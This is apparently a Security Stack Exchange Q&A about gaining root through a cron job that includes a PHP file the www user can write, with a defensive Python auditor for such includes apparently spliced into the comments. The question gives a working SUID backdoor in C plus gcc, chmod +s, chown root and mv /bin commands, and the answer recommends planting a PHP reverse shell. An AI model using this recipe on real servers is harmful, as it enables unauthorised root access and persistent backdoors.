
There is a cron job running as root on a web server every 15 minutes:

php cli-script.php

(cli stands for "Command Line Interface", so it is only accessible from the command line)

It is not possible to directly modify the PHP script cli-script.php. However, it includes another PHP script, db.php, which can be directly modified as the www user:

cli-script.php:

include "db.php";
...

My exploitation technique:

  1. Modify db.php: add a system() command, since db.php inherits root's privileges from the cron job's script but can be edited as www-user (db.php is writable, readable and executable as the www user). Run all initial commands through system().
  2. Create a binary wrapper backdoor for easier further exploitation. We need to set the UID to zero (root) to be able to use shells like bash/sh (SUID is not used after the exploit) (another way would be to use e.g. perl/python scripts).

db.php

...
system("...");
...

backdoor.c:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
    if (argc == 2) {
        setuid(0); // otherwise /bin/sh would use real UID
        system(argv[1]);
    } else {
        printf("1 argument expected\n");
    }
    return 0;
}

Detailed steps:

  1. Compile the C code as www-user: gcc backdoor.c -o backdoor
  2. Set the sticky bit and change the file owner as root: chmod +s backdoor && chown root backdoor
  3. Put the binary into the /bin/ directory as root: mv backdoor /bin/backdoor
  4. Usage (execute as www-user): backdoor "whoami" => root

Question: Is there any simpler way to exploit such a vulnerability, or am I just overcomplicating everything?

Awaaaaarghhh
    Then I guess I misunderstood. In that case the answer is simple: no, there really isn't anything simpler. Other than @gowenfawr's answer, which is what I would do - drop in a reverse shell. Otherwise though there really isn't anywhere to cut any corners. You can't modify cron, you can't edit the `cli-script.php`. Editing the file it includes which you do have access to is the only option. – Conor Mancone Aug 08 '19 at 19:55
  • @Conor Mancone yes, that makes sense. So I will accept gowenfawr's answer. But I think that such a binary wrapper is more persistent than a PHP reverse shell which was loaded into memory. It's about the quality of a backdoor. – Awaaaaarghhh Aug 08 '19 at 20:01
  • That's a bit of a different question. You asked about exploiting a cron job. Dropping in a shell is the best way to go. If you're interested in persistence then neither your backdoor nor gowenfawr's answer is ideal, because neither gives you a way to get back in once kicked out. However, either method would then allow you to drop in an actual hidden backdoor. – Conor Mancone Aug 08 '19 at 20:11
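The weakness in the setup above (a root cron job running a PHP script that includes a file the www user can write) can be audited before anyone abuses it. This is an added example, not code from the post or its answers: it resolves the literal include/require paths of a PHP script and flags any that a non-root user could alter; the temp-dir scenario it builds is constructed, and the current uid stands in for root so the script can run unprivileged.

```python
import os
import re
import stat
import tempfile

# Literal include/require (and *_once) with a single- or double-quoted path.
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*([\'"])([^\'"]+)\1')


def included_paths(script_path):
    """Return the literal paths a PHP script includes, resolved relative to the script."""
    base = os.path.dirname(os.path.abspath(script_path))
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [os.path.normpath(os.path.join(base, m.group(2))) for m in INCLUDE_RE.finditer(src)]


def is_unsafe_for_root(path, trusted_uids=(0,)):
    """True if a file executed by root could be altered by an untrusted user:
    missing (a non-root user may create it), a symlink owned by an untrusted uid,
    owned by an untrusted uid, or group/world writable."""
    try:
        link = os.lstat(path)
        if stat.S_ISLNK(link.st_mode) and link.st_uid not in trusted_uids:
            return True  # the link itself can be repointed by its owner
        st = os.stat(path)  # follow the link to the real target
    except FileNotFoundError:
        return True
    if st.st_uid not in trusted_uids:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_php(script_path, trusted_uids=(0,)):
    """List the included files that an untrusted user could modify."""
    return [p for p in included_paths(script_path) if is_unsafe_for_root(p, trusted_uids)]


def demo():
    """Constructed scenario mirroring the post: cli-script.php includes db.php and
    db.php is world-writable. Returns the basenames of the flagged includes."""
    tmp = tempfile.mkdtemp()
    cli, db = os.path.join(tmp, "cli-script.php"), os.path.join(tmp, "db.php")
    with open(cli, "w") as fh:
        fh.write('<?php\ninclude "db.php";\necho "ok";\n')
    with open(db, "w") as fh:
        fh.write("<?php\n$dsn = 'mysql:host=localhost';\n")
    os.chmod(cli, 0o644)  # the cron script itself is root-only writable
    os.chmod(db, 0o666)   # the included file is writable by the www user
    me = os.getuid()      # stand-in for root, since this demo runs unprivileged
    return [os.path.basename(p) for p in audit_cron_php(cli, trusted_uids=(me,))]


if __name__ == "__main__":
    print(demo())
```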

1 Answer


Is there any simpler way to exploit such vulnerability

It would be more straightforward to simply integrate a PHP reverse shell into the db.php file; once it runs and connects to your listener, you'll be given shell-like access as root.

gowenfawr